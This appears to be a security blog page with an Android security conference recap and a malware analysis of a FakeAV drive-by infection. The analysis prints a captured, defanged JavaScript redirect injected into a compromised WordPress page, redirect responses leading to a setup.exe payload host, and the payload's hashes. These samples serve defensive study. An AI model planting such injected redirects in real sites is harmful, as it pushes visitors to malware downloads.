Update Malaga: Slides and Demos

So I posted my slides from the Android Talk up on Google Docs. However the real meat is in the demos. I thought I would post mine, but a fellow coworker (Brad, you rock) who has much better video editing software and skills than me has done videos for all the exercises for Hacme Android. You can check out my colleague's presentation on  'Advances in Forensics on the Android' at his website.

One thing I will say about my slides: I say in slide 13 you need to use Windows for this. You don't.... you can use any OS you want (maybe even Solaris... I have not checked) as long as you have the right version of Java (recommend Java 6). I did a copy and paste from the user guide without looking at it too closely... color me embarassed when toting Windows at an Android con!

Hola from Malaga!

I am here in beautiful, sunny Malaga as I gave a talk (I know right!) regarding Android Security at the Symposium for Android Security. My talk was about a new tool McAfee just came out with to help people learning to pen test Android Apps. Hacme Android is an app you install on an emulated device which is inherently flawed so you can do some testing on it (via proxy or decompiling) to see just how broken you can get it. And (even better) there is a How-To guide in case you get flustered/lost so you can eventually get to the intended result. I think it went OK... I didnt trip on my way up the stage so I am already winning. I want to become better at public speaking and I figure the best way is to get up there and chat!
I learned a good deal about Android while writing up my presentation, but not as much as I learned at the conference.  The other talks there were awesome, with some pretty amazing and innovative ideas coming out. Some people presented on obfuscation of malware on Android devices, some talked about how to determine if you are running in an emulator or on a real phone (think Blue Pill for Android), and others talked about memory analysis for Android (Iz does not have the slides up yet, but keep checking as he will probably have them up soon!). Did you know you HAVE to be root to obtain full memory dumps from android? Did you know the only way to do that is to exploit the phone? (Is that the same for iPhones?) Imagine trying to explain that in court to a judge and jury.... oh dear! You can view all the presentation topics here, and I think the slides from ALL the presenters will be on the first link (Symposium) soon.

If anything, this conference reminded me that there is no shortage of new things to learn in the computer security field. Be it forensics, pen testing, reverse engineering. It seems like a never ending list in fact, which is both comforting and daunting :) Maybe I will post a blog about my learnings too!

I should mention the link to the Hacme Android Application is now live and operational. If you have any interest in pentesting Android Apps (or potentially seeing how flawed they can be), I recommend taking a look. Whats the harm--- its free!

Some other interesting tools now on my Check-These-Out-List:

•  Android Reverse Engineering (ARE): VM for Android Reverse Engineering
• LiME: Linux Memory Extractor
• DroidBox: Program which analyzes Adroid Applications

I leave you all with a couple of pictures from Malaga, I highly recommend it here. Lovely weather, walkable city, very close to the mountains or beach, and (of course) amazing food and wine :)

A bit of playa y montaña. This was taken from the Malagueta beach. The port (puerto) is very close by, which has some amazing restaurants and good views of all the yachts in the harbour. PROTIP: Go the the Cerveceria La Surena at the port and get a bucket of beer (5) for 3 euros. Que ganga!!

View from the the top of the hill near the Alcazaba. The yellow building is the Ayuntamiento de Málaga.

Sometimes Trouble Finds You....

It was a simple search. Nothing more.  I was looking for a picture of Dr. Sheldon Cooper from The Big Bang Theory. I go to Google Images and I (thought) I found such a nice one. I click on the thumbnail  and suddenly this popped up (in a browser window):

Ruh ruh Raggy!!

Me thinks the browser doth protest too much.... looks like we have a FakeAV on our hands. Quick-- to the VM!

So I fire up my Windows XP image and start CaptureBAT on it. I go right back to the same image I went to before and clicked it, and kerpow the same website (kxxxxdefend.info/68efd410a6a48b3c/2/) with the 'Potential Security Alerts'. This time though I download the executable, which is 'setup.exe'.

Now wait a darn tootin minute here... how did we get to this other site? What happened to the original domain I requested (which I censored to protect the innocent)? Well this TCP dump could help shed some light.

Request:

GET /wp-content/plugins/slickr-flickr/sheldon-wallpaper HTTP/1.1
Host: xxxxxxxx.xxx
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: hxxp://www.google.co.uk/imgres?q=sheldon+cooper&hl=en&biw=1040&bih=768&gbv=2&tbm=isch&tbnid=Jccw2M05I0r6bM:&imgrefurl=hxxp://xxxxxxxx.xxx/wp-content/plugins/slickr-flickr/sheldon-wallpaper&docid=qrYUJpskfIVYMM&imgurl=hxxp://xxxxxxxx.xxx/wp-content/plugins/slickr-flickr/sheldon-wallpaper.jpg&w=1024&h=824&ei=jxN7T82RNsG_0QXY9724CQ&zoom=1&iact=hc&vpx=508&vpy=358&dur=34125&hovh=201&hovw=250&tx=101&ty=191&sig=107143226035704011362&page=2&tbnh=135&tbnw=166&start=26&ndsp=29&ved=1t:429,r:14,s:26
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


Response:
HTTP/1.1 200 OK
Date: Tue, 03 Apr 2012 15:14:07 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6.3 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.32 mod_perl/2.0.5 Perl/v5.8.8
X-Powered-By: PHP/5.3.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

9f 
script var url = "hxxp://kxxxxdefend.info/68efd410a6a48b3c/2/"; if (window!=top) {top.location.href = url;} else { document.location= url;} /script
0

I actually had to remove the '<' and '>' else Google nicely tried to execute the script.... how thoughtful of them....

So I highlighted the interesting stuff in bold. So Slickr-Flickr is a plugin which allows a user to easily display Flickr photos in your blog. Cool. The script code confirms that something definitely happened to this guys site. Someone was able to upload a malicious redirect via (probably? I am not the best websec chick) the plugin or Wordpress itself. Regardless... not cool man-- to Malzilla!

So browsing via Malzilla shows us the code for the page we saw earlier:

So again I tried to highlight the good bits (I added the Moose text... ). We see a popup saying your computer is infected... no mater what you do, it calls the function 'al'... which gets us the ol familiar warning of impending doom on your computer.  It basically says in the coordinates that happen to be over the 'Clean Computer' button, go to the download page. If you try to click the 'X' box, the function al is called again. Anyways lets point Mozilla to the 'download' page and see what happens.....

OMG! Another redirect! This is getting silly don't you think? Luckily as we can see this is the end... and we get our setup.exe. Look quickly again at the response we received when going to the download page:

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 03 Apr 2012 16:22:37 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hxxp://dxxxxdebug.info/68efd410a6a48b3c/2/setup.exe

So we got to the 'download' page only to be pushed somewhere else. Info about the file:

• Name: setup.exe
• MD5: 22D7CF7B0591E8C9688769D5F502DDF4
• SHA: 1b9c0e6709b163e918477711c384705a8ef28eea776d58b86f49a98998ae8595
• Size: 2187394 bytes
• What VirusTotal Says: 5/42 AV's say its bad. Report here.

 So this type of redirect can happen more often than one would like to believe. Here are some links discussing it (PCWorld, KrebsOnSecurity, and this lady named Julian Evans). Make sure you have good AV... or better yet, use NoScript or something similar. If you have a Word Press site and are worried about things like this... WP has an exploit scanner you can run!

As Dr. Cooper would say: BAZINGA